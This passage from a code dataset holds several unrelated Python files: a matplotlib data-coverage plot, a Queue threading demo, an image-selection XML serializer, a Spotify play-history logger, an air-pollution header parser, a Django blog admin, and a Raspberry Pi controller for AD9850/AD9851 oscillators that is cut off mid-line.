data_coverage, data_coverage_2D_array\n\tdef get_data_coverage_from_file():\n\t\tdata_coverage = json.load(open(PLOT_DATA_PATH, 'r'))\n\t\tdata_coverage_2D_array = [ticker_data_coverage for ticker, (number_of_quarters_covered, ticker_data_coverage) in data_coverage.items()]\n\t\treturn data_coverage, data_coverage_2D_array\n\n\n\tassets = self.get_data_of_all_assets('local')\n\tnum_assets = len(assets.keys())\n\tnum_metrics = list(assets.values())[0].shape[1]\n\tcols = list(assets.values())[0].columns\n\t# print(cols)\n\t# print(len(cols))\n\n\tquarters, num_quarters, earliest_quarter, latest_quarter = \\\n\t\tget_quarters(assets, verbose=verbose)\n\t# data_coverage_dct, data_coverage_2D_array = calculate_data_coverage(assets, quarters)\n\tdata_coverage_dct, data_coverage_2D_array = get_data_coverage_from_file()\n\n\t# plot the data coverage\n\tif verbose:\n\t\tprint('\\nPlotting data coverage ...')\n\tfig, ax = plt.subplots()#figsize=(12, 6.5))\n\tfig.canvas.set_window_title(self.report_name)\n\tfig.canvas.manager.window.showMaximized() # go fullscreen\n\tred_to_green_cmap = mcolors.LinearSegmentedColormap.from_list('', ['red', 'yellow', 'green'])\n\t# colormaps: https://matplotlib.org/devdocs/tutorials/colors/colormaps.html#list-colormaps\n\tplot = ax.pcolormesh(data_coverage_2D_array, cmap='RdYlGn')#'RdBu')#red_to_green_cmap)\n\tax.set_title(\n\t\t'Data Coverage of Fundamental Data of %d Stocks over %d Quarters (%.2f Years)' % (\n\t\tnum_assets,\n\t\tnum_quarters,\n\t\t(num_quarters / 4)),\n\t\tfontsize=14)\n\tax.set_ylabel('%d Stocks (sorted from least to most coverage)' % num_assets)\n\tax.set_yticks([])\n\tax.set_xlabel('Quarters')\n\tyears = sorted(set(map(lambda q : q.split('-')[0], quarters)))\n\tyears_x_loc = []\n\tfor y in years:\n\t\t# year x loc goes at beginning of quarter\n\t\tquarters_in_year = list(filter(lambda q : q.split('-')[0] == y, quarters))\n\t\tq1 = min(quarters_in_year)\n\t\tyears_x_loc.append(quarters.index(q1))\n\tmry = int(latest_quarter.split('-')[0]) # mry = most recent year\n\tyears = list(map(lambda y : y if (mry-int(y))%5==0 else '', years))\n\tax.set_xticks(years_x_loc)\n\tax.set_xticklabels(years)\n\n\t# format labels appear when hoving over a point\n\t# source: https://stackoverflow.com/questions/7908636/possible-to-make-labels-appear-when-hovering-over-a-point-in-matplotlib\n\tdef format_coord(x, y):\n\t\tticker = list(data_coverage_dct.keys())[int(y)]\n\t\tquarter = quarters[int(x)]\n\t\t_y, _m, _d = tuple(quarter.split('-'))\n\t\tquarter_label = '%s Q%d' % (_y, (int(_m) / 3))\n\t\tnum_quarters_with_nonzero_coverage = data_coverage_dct[ticker][0]\n\t\tquarter_values_with_nonzero_coverage = \\\n\t\t\tlist(filter(lambda coverage : coverage > 0.0, data_coverage_dct[ticker][1]))\n\t\tdata_coverage_average_of_all_non_zero_quarters = \\\n\t\t\tfloat(sum(quarter_values_with_nonzero_coverage)) / len(quarter_values_with_nonzero_coverage) \\\n\t\t\tif len(quarter_values_with_nonzero_coverage) > 0 else 0.0\n\t\tpercent_of_quarters_with_nonzero_data_coverage = \\\n\t\t\t100.0 * float(num_quarters_with_nonzero_coverage) / num_quarters\n\t\tcurrent_quarter_coverage = data_coverage_dct[ticker][1][int(x)]\n\t\tcurrent_quarter_coverage_pct = 100 * float(current_quarter_coverage) / num_metrics\n\t\ts1 = \"Stock %d / %d: %s%s\" % (int(y)+1, num_assets, ticker, ' '*(6-len(ticker)))\n\t\ts2 = \"Quarter: %s, %d / %d fields (%.1f%%) are covered\" % (quarter_label, current_quarter_coverage, num_metrics, current_quarter_coverage_pct)\n\t\ts3 = \"%d / %d quarters (%.1f%%) have data.\" % (num_quarters_with_nonzero_coverage, num_quarters, percent_of_quarters_with_nonzero_data_coverage)\n\t\ts4 = \"Data's average coverage: %.1f%%.\" % (data_coverage_average_of_all_non_zero_quarters)\n\t\treturn '\\t'.join([s1, s2, s3, s4])\n\tax.format_coord = format_coord\n\n\t# legend\n\t# source: https://stackoverflow.com/questions/32462881/add-colorbar-to-existing-axis\n\tdivider = make_axes_locatable(ax)\n\tcax = divider.append_axes('right', size='5%', pad=0.10)\n\ttick_locs = np.linspace(0, num_metrics-1, 5) # why there should be -1 idk, but without it the top tick disappears\n\tcbar = fig.colorbar(\n\t\tplot,\n\t\tcax=cax,\n\t\torientation='vertical')\n\tcbar.ax.set_ylabel('Percent Data Coverage (out of %d fields)' % num_metrics, fontsize=12)\n\tcbar.set_ticks(tick_locs)\n\tcbar.ax.set_yticklabels(['0 %', '25 %', '50 %', '75 %', '100 %'])\n\n\n\tplt.show()\n\tif verbose:\n\t\tprint('Plot complete.\\n')\n\n\n\nif __name__ == '__main__':\n\tchart_number = select_chart()\n\tif chart_number == 1: plot_stock_vs_quarter(num_indents=0)\n\tif chart_number == 2: plot_metric_vs_quarter(num_indents=0)\n\tif chart_number == 3: pass\n\tif chart_number == 4: pass\n","repo_name":"LukeDickerson19/value-investing-app","sub_path":"database/sec/financial_statements_data_sets/src/plot_data_quality.py","file_name":"plot_data_quality.py","file_ext":"py","file_size_in_byte":16966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16706047811","text":"# -*- coding:utf-8 -*-\n\"\"\"\nQueue 先进先出 线程安全\n\"\"\"\nfrom __future__ import print_function\nimport Queue, time, threading\n\n\ndef qu_fifo():\n \"\"\"\n FIFO 先进先出\n :return:\n \"\"\"\n q = Queue.Queue()\n for i in range(1,6):\n q.put(i)\n\n while True:\n if q.empty():\n break\n item = q.get()\n print(item, end=' ')\n\ndef create_qu(q):\n for i in range(1,6):\n print(\"put item:%s\"%(i))\n q.put(i)\n time.sleep(1)\n\ndef cost_qu(q):\n while True:\n if q.empty():\n break\n item = q.get()\n print(\"get item:%s\"%(item))\n time.sleep(1)\n\ndef main():\n q = Queue.Queue()\n create = threading.Thread(target=create_qu, args=(q,))\n cost = threading.Thread(target=cost_qu, args=(q,))\n\n create.start()\n cost.start()\n\n create.join()\n cost.join()\n\n\ndef qu_lifo():\n \"\"\"\n LOFO 后进先出\n :return:\n \"\"\"\n q = Queue.LifoQueue()\n for i in range(1,6):\n q.put(i)\n\n while True:\n if q.empty():\n break\n item = q.get()\n print(item, end=' ')\n\n\nif __name__ == '__main__':\n print(\"============FIFO===========\")\n qu_fifo()\n print()\n main()\n print(\"=============LIFO===========\")\n qu_lifo()","repo_name":"rzlmma/pythonPro","sub_path":"standardLibrary/datastruct/queue/qu_code.py","file_name":"qu_code.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21204249747","text":"#License: Public Domain\n#\n#imgselection.py\n#\n\"\"\"Provides the implementation for representing an image learning \nselection\n\nUnit tests are in the current directory (test_imgselection.py)\"\"\"\n#standard modules:\nimport imghdr\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nimport xml.etree.ElementTree as ET\nfrom collections.abc import MutableSequence\n#third-party modules:\nfrom pygame import image\n#local(included) modules:\nimport imgresult\nimport imgsnipper\nfrom pyextra import Validators\nfrom imgsnipper import ImageSnipperBase\nfrom iserializer import ISerializer\nfrom imgsnipper import RectangularSnipper\n\n__all__ = [\"ImageSelection\", \"ISSerializer\"]\n\nclass ImageSelection(MutableSequence):\n \"\"\"\n This class provides the concrete representation of image training data \n that is used to maintain and manage image learning selection.\n \"\"\"\n def __init__(self, bwidth, bheight, snipper = RectangularSnipper):\n \"\"\"\n ImageSelection.__init__(bwidht, bheight, snipper = \n RectangularSnipper) -> ImageSelection\n \n Construncts image selection object.\n \"\"\"\n if not issubclass(snipper, ImageSnipperBase):\n raise TypeError(\"The specified snipper must be a subclass \"\n \"that derived from imgsnipper.ImageSnipperBase\")\n if not isinstance(bwidth, int) or not isinstance(bheight, int):\n raise TypeError(\"Both the block width and the block height \"\n \"must be integers, not ({}, {})\".format(\n type(bwidth), type(bheight)))\n elif bwidth < 1 or bheight < 1:\n raise ValueError(\"Both the block width and the block height \"\n \"must be more than one, not ({}, {})\".format(\n bwidth, bheight))\n self.__bwidth = bwidth\n self.__bheight = bheight\n self.__snipper = snipper\n self.__items = []\n self.__results = []\n \n def __repr__(self):\n \"\"\"\n S.__repr__() <==> repr(S) -- \"official\" string representation\n \"\"\"\n return \"{}({}, {}, {})\".format(self.__class__.__name__, \n self.__snipper.__name__, self.__bwidth, self.__bheight)\n\n def __len__(self):\n \"\"\"\n S.__len__() <==> len(S)\n \"\"\"\n return len(self.__items)\n\n def __getitem__(self, key):\n \"\"\"\n S.__getitem__((index, *parser)) -> tuple\n Return value: results, ImageSnipper [,ImageSniper, ...]\n \n * 'parser' -- any one-argument function for mapping pixels\n * 'index' -- index of the desired item\n \"\"\"\n if len(key) < 2:\n raise IndexError(\"The specified key can not be allowed. \"\n \"The key must include one index and at least one \"\n \"parser function\")\n index = Validators.arrayindex(key[0], len(self))\n surface = image.load(self.__items[index])\n return ((self.__results,) + tuple(self.__snipper(surface, \n self.__bwidth, self.__bheight, pix_parser = parser) \n for parser in key[1:]))\n\n def __setitem__(self, index, value):\n \"\"\"S.__setitem__(i, v) <==> S[i] = v\"\"\"\n index = Validators.arrayindex(index, len(self))\n index = self.insert(index, value)\n del self[index + 1]\n \n def __delitem__(self, index):\n \"\"\"S.__delitem__(index) <==> del I[index] -- delete item\"\"\"\n del self.__items[index]\n del self.__results[index]\n\n def insert(self, index, value):\n \"\"\"\n S.insert item before the index\n \"\"\"\n path, result = value\n if not isinstance(result, imgresult.ImageResultBase):\n raise TypeError(\"The 'result' must implement \"\n \"imgresult.ImgageResultBase\")\n index = Validators.arrayindex(index, len(self) + 1)\n if not imghdr.what(path) in ('jpeg', 'png', 'gif', \n 'bmp', 'tiff', 'pbm', 'bgm', 'ppm' ):\n return TypeError(\"The specified file is not supported\")\n self.__items.insert(index, path)\n self.__results.insert(index, result)\n return index\n\n def paths(self):\n \"\"\"S.paths() -> tuple -- return all paths\"\"\"\n return tuple(self.__items)\n\n def results(self):\n \"\"\"S.results() -> results -- return all results\"\"\"\n return tuple(self.__results)\n\n @property\n def snipper(self):\n \"\"\"\n S.snipper -> ImageSnipper, int (block width), int (block height)\n \"\"\"\n return self.__snipper, self.__bwidth, self.__bheight\n\n @property\n def bshape(self):\n \"\"\"S.bshape -> tuple(width, height) -- block shape\"\"\"\n return self.__bwidth, self._bheight\n\nclass ISSerializer(ISerializer):\n \"\"\"\n Provides a simple implementation for serialization to and from \n standard XML. It can be used for parsing/writing ImageSelection \n objects from/to an XML-file\n \"\"\"\n TAG_ROOT = \"imgselection\"\n TAG_IMG = \"image\"\n ATTR_PATH = \"path\"\n ATTR_SNIPPER = \"snipper\"\n ATTR_RESULT_FUNC = \"result_function\"\n ATTR_BLOCK_WIDTH = \"bwidht\"\n ATTR_BLOCK_HEIGHT = \"bheight\"\n \n @staticmethod\n def write(source, target):\n \"\"\"\n ISSerializer.write(source, target) -> None\n \n Writes your image selection to the specified file\n * \"source\" is an instance of ImageSelection or of a subclass\n thereof\n * \"target\" is either the name of a file of a binary file object\n \"\"\"\n if not isinstance(source, ImageSelection):\n raise TypeError(\"Invalid source type. ImageSelection \"\n \"implementations are only acceptible\")\n Validators.bfileobject(target)\n snipfunc, bwidth, bheight = source.snipper\n #root attributes contain snipper parameters\n root = ET.Element(ISSerializer.TAG_ROOT, attrib = {\n ISSerializer.ATTR_SNIPPER : snipfunc.__name__,\n ISSerializer.ATTR_BLOCK_WIDTH : str(bwidth),\n ISSerializer.ATTR_BLOCK_HEIGHT : str(bheight)})\n #Sub elements provide image links and result values\n for path, result in zip(source.paths(), source.results()):\n sub = ET.SubElement(root, ISSerializer.TAG_IMG, attrib = {\n ISSerializer.ATTR_PATH : path,\n ISSerializer.ATTR_RESULT_FUNC : result.__class__.__name__})\n sub.text = result.to_string()\n ET.ElementTree(root).write(target)\n\n @staticmethod\n def parse(target, outresult = ImageSelection):\n \"\"\"\n ISSerializer.parse(target) -> ImageSelection\n \n Loads an image selection from its XML-representation.\n * \"target\" is either a filename or a file object\n * \"outresult\" is either the ImageSelection class of a subclass\n thereof\n \"\"\"\n if not issubclass(outresult, ImageSelection):\n raise TypeError(\"'outresult' argument be either the\"\n \"ImageSelection class or a subclass thereof.\")\n Validators.bfileobject(target)\n root = ET.parse(target).getroot()\n snipfunc = root.get(ISSerializer.ATTR_SNIPPER)\n bwidth = int(root.get(ISSerializer.ATTR_BLOCK_WIDTH))\n bheight = int(root.get(ISSerializer.ATTR_BLOCK_HEIGHT))\n snipfunc = getattr(imgsnipper, snipfunc)\n \n S = outresult(bwidth, bheight, snipper = snipfunc)\n for image in root:\n path = image.get(ISSerializer.ATTR_PATH)\n rfunc = image.get(ISSerializer.ATTR_RESULT_FUNC)\n result = getattr(imgresult, rfunc).from_string(image.text)\n S.append((path, result))\n return S\n","repo_name":"thetechbuilder/map_analyzer","sub_path":"imgselection.py","file_name":"imgselection.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31922178069","text":"import spotipy\nimport spotipy.util as util\nfrom pymongo import MongoClient\nfrom profileinfo import username, client_id, client_secret, cluster\nimport time \n\n# database setup\nclient = MongoClient(cluster)\ndb = client.spotify\nstats = db.stats\n\n# spotify login\ntoken = util.prompt_for_user_token(\n username,\n scope=[\"user-read-recently-played\", \"playlist-modify-private\"], # https://developer.spotify.com/documentation/general/guides/authorization/scopes/#playlist-modify-private\n client_id=client_id,\n client_secret=client_secret,\n redirect_uri='http://localhost/'\n)\n\n# sets starting point\nmost_recent = {'name': 'Dark seeks light', 'artist': 'ニノミヤユイ', 'duration': 214426, 'played_at': '2022-01-24T16:11:20.801Z'}\n\nwhile True: \n sp = spotipy.Spotify(auth=token)\n recently_played = sp.current_user_recently_played(limit=50)['items']\n\n for song in recently_played:\n my_dict = {'name':[],'artist':[],'duration':[],'played_at':[]}\n my_dict['name'] = (song['track']['name'])\n my_dict['artist'] = (song['track']['artists'][0]['name'])\n my_dict['duration'] = (song['track']['duration_ms'])\n my_dict['played_at'] = (song['played_at'])\n\n # check if updated\n if my_dict == most_recent:\n print('caught up!')\n break\n \n result = stats.insert_one(my_dict)\n print(f'Inserted: {my_dict}')\n\n # set new most_recent\n most_recent = {\n 'name':recently_played[0]['track']['name'],\n 'artist':recently_played[0]['track']['artists'][0]['name'],\n 'duration':recently_played[0]['track']['duration_ms'],\n 'played_at':recently_played[0]['played_at']\n }\n\n print(f'most recent: {most_recent}')\n time.sleep(7200)","repo_name":"joeywangzr/Spotify-Tracking","sub_path":"tracking system/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72294777521","text":"\nclass XLHEADERS():\n COUNTRY = 'country'\n CITY = 'city'\n STATION_EOI_CODE = 'stationeoicode'\n STATION_NAME = 'stationname'\n AIR_POLLUTANT = 'airpollutant'\n AIR_POLLUTION_LEVEL = 'airpollutionlevel'\n TYPE = 'type'\n AREA = 'area'\n LONGITUDE = 'longitude'\n LATITUDE = 'latitude'\n ALTITUDE = 'altitude'\n\n choices = [COUNTRY, CITY, STATION_EOI_CODE, STATION_NAME, AIR_POLLUTANT, AIR_POLLUTION_LEVEL, TYPE, AREA,\n LONGITUDE, LATITUDE, ALTITUDE]\n\n\ndef get_headers_and_units(ws):\n headers_row = None # на какой строке начинается заголовок.\n headers = {} # в каком столбце название заголовка\n units = '' # единицы измерения\n\n # get headers row\n for row in range(ws.max_row + 1):\n cell = ws['A'][row].value\n if isinstance(cell, str) and 'country' in cell.lower():\n headers_row = row\n break\n if headers_row is None:\n return None, None, None\n\n # remember headers' positions\n for i in range(ws.max_column):\n column = chr(i + 65)\n header = ws[column][headers_row].value\n if header is None:\n break\n header = header.strip().replace('_', '').lower()\n # print(type(header))\n\n # get units\n if 'm3' in header:\n units_index = header.find('(') + 1\n for index in range(units_index, units_index + 20):\n if header[index] == ')':\n break\n units += header[index]\n # print(type(units))\n elif 'unit' in header:\n units = ws[column][headers_row + 1].value\n continue\n\n units = units if units != 'count' else 'µg/m3'\n\n # Map headers with their indices\n for choice in XLHEADERS.choices:\n if choice in header:\n headers[choice] = i\n break\n\n return headers_row, headers, units\n\n\n\n\n\n\n\n\n\n","repo_name":"ArsenAjiev/markets_portfolio","sub_path":"airpollution/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23940181494","text":"from html import escape as html_escape\n\nfrom django.contrib.admin import site as admin_site\nfrom django.utils import timezone\n\nfrom django.contrib.admin import (\n ModelAdmin,\n StackedInline,\n)\n\nfrom .models import (\n Article,\n ArticleTag,\n Commenter,\n ArticleComment,\n)\n\n\nclass ArticleTagInline (StackedInline):\n model = ArticleTag\n\n\nclass ArticleCommentInline (StackedInline):\n model = ArticleComment\n\n\nclass ArticleAdmin (ModelAdmin):\n list_display = (\n \"slug\",\n \"title\",\n \"author\",\n \"creation_date\",\n )\n\n inlines = [\n ArticleTagInline,\n ArticleCommentInline,\n ]\n\n\nclass ArticleTagAdmin (ModelAdmin):\n list_display = (\n \"tag\",\n \"article\",\n )\n\n\nclass CommenterAdmin (ModelAdmin):\n actions = (\n \"ban_all\",\n \"unban_all\",\n )\n\n list_display = (\n \"ip_hash\",\n \"time_banned\",\n )\n\n def ban_all(self, request, queryset):\n \"\"\"\n Issue a ban for all unbanned commenters.\n \"\"\"\n (\n queryset\n .filter(time_banned__isnull=True)\n .update(time_banned=timezone.now())\n )\n\n ban_all.short_description = \"Ban all selected commenters.\"\n\n def unban_all(self, request, queryset):\n \"\"\"\n Unban all commenters.\n \"\"\"\n queryset.update(time_banned=None)\n\n unban_all.short_description = \"Unban all selected commenters.\"\n\n\nclass ArticleCommentAdmin (ModelAdmin):\n fields = (\n \"commenter_link\",\n \"article\",\n \"poster_name\",\n \"content\",\n )\n\n readonly_fields = (\n \"commenter_link\",\n \"article\",\n )\n\n list_display = (\n \"article\",\n \"poster_name\",\n \"creation_date\",\n )\n\n def commenter_link(self, obj):\n if obj is None or not obj.pk:\n return \"(None)\"\n\n return '{}'.format(\n obj.commenter.pk,\n html_escape(obj.commenter.ip_hash),\n )\n\n commenter_link.short_description = \"Commenter\"\n commenter_link.allow_tags = True\n\n\nadmin_site.register(Article, ArticleAdmin)\nadmin_site.register(ArticleTag, ArticleTagAdmin)\nadmin_site.register(Commenter, CommenterAdmin)\nadmin_site.register(ArticleComment, ArticleCommentAdmin)\n","repo_name":"w0rp/w0rpzone","sub_path":"blog/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73724566322","text":"\r\n\"\"\" Version 0.1 - working prototype, must be refactored including the documentation.\r\n Utility for the AD9850/1 VCO (Voltage Controlled Oscillator) - module, connected to GPIO of Rpi.\r\n Supports all functions of the VCO - in serial mode. For hardware config see specs\r\n Program may configured to run on RPI or on master, connected to local network \"\"\"\r\n\r\nfrom math import pow, log10 as lg\r\nimport os, sys\r\n\r\n# To install gpiozero for acces gpio-pins see:\r\n# https://gpiozero.readthedocs.io/en/stable/remote_gpio.html#preparing-the-control-computer\r\nfrom gpiozero import LED\r\n\r\n# *** CONFIGURATION ***\r\n\r\n# RPI: for remote access enable or install Remote GPIO to allow communication via daemon\r\n# sudo systemctl start pigpiod => run daemon once\r\n# sudo systemctl enable pigpiod => run daemon at (re)boot\r\n\r\n# used VCO's.\r\n# WARNING configuring a D9850 as AD9851 may unintentionally set Factory Reserved Codes\r\nVCO_A = \"AD9851\" # or \"AD9850\"\r\nVCO_B = \"AD9850\" # or \"AD9851\" or None\r\n\r\n# Max VCO-clock at 5V supply voltage, but be aware of RPi 3,3V limit for GPIO-pins.\r\n# No problem encountered with 5V supply when only connecting the input pins of VCO to RPi.\r\nAD9851_clock = 30000000 # default (and max for 5 volt supply) crystal frequency AD9851\r\nAD9850_clock = 125000000 # default (and max for 5 volt supply) crystal frequency AD9850\r\n\r\n# Pin factories see: https://gpiozero.readthedocs.io/en/stable/api_pins.html\r\n# uncomment JUST ONE pin factory:\r\n# \r\n# pin_factory = \"rpigpio\" # When program runs on RPi, is DFAULT pin factory (uses RPI.GPIO lib)\r\n# pin_factory = \"mock\" # emulates gpio pins for test purposes\r\npin_factory = \"pigpio\" # for remote connection see:\r\n # https://gpiozero.readthedocs.io/en/stable/remote_gpio.html \r\n\r\n# Remote acces: fill in ip address of RPi for pigpio of wifi / utp cable connection\r\nip_addr=\"192.168.1.46\"\r\n\r\n# gpio interface wth VCO module (use gpio numbers, not physical pin numbers)\r\ngif_A = dict(RESET=22, W_CLK=23, FQ_UD=24, DATA=25)\r\n\r\n# gpio interface second VCO if connected\r\ngif_B = dict(RESET=26, W_CLK=17, FQ_UD=27, DATA=6)\r\n\r\nstart_freq = 1000 # Initial frequentie VCO\r\n\r\n#*** END CONFIGURATION ***\r\n\r\nclass PrgrsBar:\r\n def __init__(self, bar_len = 50, bar_char='-', limit_char = '|'):\r\n self.bar_len = bar_len\r\n self.bar_char = bar_char\r\n self.limit_char = limit_char\r\n self.cur_len = 0\r\n self.ref_bar = False\r\n\r\n def _ref_bar_init(self):\r\n print(f\"{self.limit_char}{self.bar_len*self.bar_char}{self.limit_char}\")\r\n print('>', end = '')\r\n self.cur_len = 0\r\n self.ref_bar = True\r\n\r\n def prgrs(self, fraction):\r\n if fraction < 0 or fraction > 1:\r\n return False\r\n if self.ref_bar:\r\n self.bar_val = int(fraction * self.bar_len)\r\n if self.bar_val > self.cur_len:\r\n print(f\"{(self.bar_val - self.cur_len) * self.bar_char}\", end = '')\r\n self.cur_len = self.bar_val\r\n if self.cur_len >= self.bar_len:\r\n print('<')\r\n self.cur_len = 0\r\n self.ref_bar = False\r\n else:\r\n self._ref_bar_init()\r\n self.ref_bar = True\r\n return True\r\n\r\nclass parse(): # parse and execute user commands\r\n # multiply factors for values\r\n mulfactors = {'k':1000, 'K':1000, 'm':1000000, 'M':1000000, 'c':0.01, 'C':0.01}\r\n \r\n def __init__(self, system_interface1, system_interface2):\r\n self.cmds = dict(c=self.config, f=self.freq, h=self.help, r=self.reset, i=self.idle_mode, \\\r\n s=self.sweep, l=self.lsweep, q=self.quit,w=self.restore_reg, \\\r\n p=self.phase_shift, m=self.multiplier, a=self.a_VCO, b=self.b_VCO)\r\n\r\n self.pb = PrgrsBar() # Progress bar for frequency sweep\r\n \r\n self.sif_A = system_interface1\r\n self.sif_B = system_interface2\r\n self.sif = self.sif_A\r\n \r\n if self.sif_B != None:\r\n self.prompt = 'A'\r\n self.cmds.update(e=self.exchange)\r\n else: self.prompt = \"\"\r\n \r\n def isreal(self, s): # value is real number - test\r\n try:\r\n x = float(s)\r\n return x\r\n except: return None\r\n\r\n def param_val(self, s): # convert number string to real number\r\n for i in self.mulfactors.keys():\r\n if i in s:\r\n s = s.replace(i ,\"\", -1)\r\n value = self.isreal(s.strip())\r\n if value != None:\r\n return value * self.mulfactors[i]\r\n else: return None\r\n \r\n return self.isreal(s.strip())\r\n \r\n def xqt_cmd(self, cmd):\r\n # treat single number as frequency command (add 'f' to number string)\r\n if cmd[0].isdigit() or cmd[0] == '.':\r\n cmd = 'f'+ cmd\r\n\r\n if cmd[0].lower() in self.cmds.keys(): # ==> execute command\r\n if not self.cmds[cmd[0].lower()](cmd):\r\n print(f\"Error in cmd: {cmd}\")\r\n else:\r\n print(f\"Invalid cmd: {cmd}\")\r\n\r\n\r\n def get_cmd(self): # get and execute user command\r\n print(\"enter command (h for help):\")\r\n while True:\r\n user_input = input(f\"{self.prompt}?\").strip()\r\n if user_input == \"\":\r\n continue\r\n \r\n self.xqt_cmd(user_input.strip())\r\n\r\n # General user functions to execute\r\n def a_VCO(self, cmd):\r\n saved = self.sif\r\n self.sif = self.sif_A\r\n if len(cmd) > 1:\r\n self.xqt_cmd(cmd[1:].strip())\r\n self.sif = saved\r\n return True\r\n\r\n def b_VCO(self, cmd):\r\n saved = self.sif\r\n self.sif = self.sif_B\r\n if len(cmd) > 1:\r\n self.xqt_cmd(cmd[1:].strip())\r\n self.sif = saved\r\n return True\r\n \r\n def exchange(self, cmd):\r\n if self.prompt == 'A':\r\n self.prompt = 'B'\r\n self.sif = self.sif_B\r\n else:\r\n self.prompt = 'A'\r\n self.sif = self.sif_A\r\n return True\r\n \r\n def sweep(self, cmd): # frequency sweep\r\n params = cmd[1:].strip().split()\r\n if len(params) == 3:\r\n values = []\r\n try:\r\n values = [self.param_val(i) for i in params]\r\n except:\r\n return False\r\n f_start = values[0]; f_end = values[1]; f_incr = values[2]\r\n if f_start < f_end:\r\n print(f'Sweep {f_start} {f_end} {f_incr}')\r\n f = f_start\r\n f_range = f_end - f_start\r\n while True:\r\n f = f if f <= f_end else f_end\r\n self.sif.set_freq(f)\r\n self.pb.prgrs((f-f_start)/f_range)\r\n if f >= f_end:\r\n break\r\n f += f_incr\r\n return True\r\n return False\r\n\r\n def lsweep(self, cmd): # logarithmic (exponential) frequency sweep\r\n params = cmd[1:].strip().split()\r\n if len(params) == 3:\r\n values = []\r\n try:\r\n values = [self.param_val(i) for i in params]\r\n except:\r\n return False\r\n \r\n f_start = values[0]; f_end = values[1]; f_steps = int(values[2])\r\n exp_start = lg(f_start)\r\n exp_end = lg(f_end)\r\n exp_range = exp_end - exp_start\r\n exp_incr = exp_range / f_steps\r\n print(f'Sweep {f_start} {f_end} {f_steps}')\r\n f=pow(10,exp_start)\r\n exp = exp_start\r\n\r\n for step in range(f_steps+1):\r\n self.sif.set_freq(f)\r\n self.pb.prgrs((step)/f_steps)\r\n exp += exp_incr\r\n f = pow(10, exp)\r\n return True\r\n else:\r\n return False\r\n \r\n def quit(self, cmd): # end program\r\n if len(cmd) == 1:\r\n sys.exit()\r\n return False\r\n\r\n def config(self, cmd):\r\n self.sif.show_config()\r\n return True\r\n \r\n def help(self, cmd):\r\n print(\"\"\"\r\n Command letters may be upper or lower case\r\n -----------------------------------------\r\n - a: VCO A prefix, xqt command once for VCO A - example B?af 1000\r\n - b: VCO B prefix, xqt command once for VCO B - example A?bf 1000\r\n - e: change default VCO (VCO A <=> VCO B)\r\n - f: frequency: f freq# or freq#[k-kHz, m-mHz, c-1/100Hz] - examples: f100k ; 1m\r\n - s: sweep freq: s start freq, end freq, delta freq - example: s 1000 1m 100k\r\n - l: log (exp) sweep: l start freq, end freq, number of steps - l 20 20k 20\r\n - m: set/reset frequency multiplier: (AD9851 only, may harm AD9850!): m+ / m-\r\n - p: set phase shift (0..31 X 11.25 degrees): p number[0..31] - example: p 23\r\n - i: set/reset idle (power) mode: i+ / i-\r\n - r: reset frequency generator AND clears VCO-register\r\n - w: write register (restore VCO register value)\r\n - c: show current configuration settings\r\n - q: quit program\r\n - h: This help function: h\\n\"\"\")\r\n return True\r\n\r\n # logical AD98x chip-functions to execute \r\n def freq(self, cmd): # set frequency\r\n self.freq = self.param_val(cmd[1:].strip())\r\n if self.freq != None:\r\n return self.sif.set_freq(self.freq)\r\n else:\r\n return False\r\n\r\n def idle_mode(self, cmd):\r\n if '+' in cmd:\r\n return self.sif.set_pwr_sleep(1)\r\n\r\n elif '-' in cmd:\r\n return self.sif.set_pwr_sleep(0)\r\n\r\n return False\r\n \r\n def phase_shift(self, cmd):\r\n phase = self.param_val(cmd[1:].strip())\r\n print(\"phase: \", phase)\r\n if phase != None and phase in range(32):\r\n return self.sif.set_phase_shift(int(phase))\r\n return False\r\n\r\n def multiplier(self, cmd):\r\n print(\"multiplier set/reset\")\r\n if '+' in cmd:\r\n return self.sif.set_multiplier(1)\r\n elif '-' in cmd:\r\n return self.sif.set_multiplier(0)\r\n else: return False\r\n\r\n def reset(self, cmd):\r\n return self.sif.reset()\r\n\r\n def restore_reg(self,cmd):\r\n return self.sif.set_reg_vals()\r\n \r\n#=========================== low level IO functions\r\n\r\nclass CntrlFunctions(): # low level io interface functions\r\n def __init__(self):\r\n self.reset()\r\n self.resetpin.off()\r\n self.w_clk.off()\r\n self.data.off()\r\n self.fq_ud.off()\r\n\r\n def pulse(self, pin): # simple pulse \r\n pin.on()\r\n# pin.on() # repeat when pulse width is too short\r\n pin.off()\r\n\r\n def reset(self):\r\n self.pulse(self.resetpin)\r\n self.write_reg(0,0) # define register value, undefined control bits may harm chip\r\n return True\r\n\r\n def write_reg(self, word, byte): # write control byte and frequency word bit for bit to chip\r\n\r\n for i in range (32):\r\n if word & 0x01: self.data.on()\r\n else: self.data.off()\r\n word = word >> 1\r\n self.pulse(self.w_clk)\r\n \r\n for i in range (8):\r\n if byte & 0x1: self.data.on()\r\n else: self.data.off()\r\n byte = byte >> 1\r\n self.pulse(self.w_clk)\r\n \r\n self.pulse(self.fq_ud)\r\n return True\r\n\r\nclass GpioADxIf(CntrlFunctions): # set IO paramters\r\n def __init__(self, params):\r\n self.resetpin = LED(params[\"RESET\"])\r\n self.w_clk = LED(params[\"W_CLK\"])\r\n self.fq_ud = LED(params[\"FQ_UD\"])\r\n self.data = LED(params[\"DATA\"])\r\n super().__init__()\r\n\r\n#================= logical functions for AD98x chip\r\n\r\nclass AD98x():\r\n def __init__(self, iface):\r\n self.clock_freq = self.sys_clock\r\n self.freq_word = 0x0\r\n self.phase_shift = 0\r\n self.iface = iface\r\n# self.reset # for test\r\n\r\n def show_config(self): # current status of AD98x\r\n print(self.ic_name)\r\n print(f\"Register: 